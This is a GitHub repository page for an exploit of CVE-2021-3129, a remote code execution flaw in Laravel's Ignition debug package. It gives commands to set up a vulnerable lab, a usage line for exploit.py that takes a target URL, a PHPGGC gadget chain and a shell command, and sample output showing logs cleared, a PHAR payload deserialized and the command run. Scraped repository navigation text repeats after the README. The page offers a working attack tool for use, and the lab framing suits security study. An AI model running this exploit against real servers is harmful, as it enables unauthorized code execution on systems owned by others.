CVE-2021-3129_exploit

Exploit for CVE-2021-3129

Lab setup:

$ git clone https://github.com/laravel/laravel.git
$ cd laravel
$ git checkout e849812
$ composer install
$ composer require facade/ignition==2.5.1
$ php artisan serve

Usage:

$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
$ cd CVE-2021-3129_exploit
$ chmod +x exploit.py
$ ./exploit.py http://localhost:8000 Monolog/RCE1 id

Example:

nth347@nth347:~$ ./exploit.py http://localhost:8000 Monolog/RCE1 "uname -a"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited

Linux nth347 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux

[i] Trying to clear logs
[+] Logs cleared

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
README.md		README.md
exploit.py		exploit.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2021-3129_exploit

Lab setup:

Usage:

Example:

Reference:

About

Releases

Packages

Languages

nth347/CVE-2021-3129_exploit

Folders and files

Latest commit

History

Repository files navigation

CVE-2021-3129_exploit

Lab setup:

Usage:

Example:

Reference:

About

Topics

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages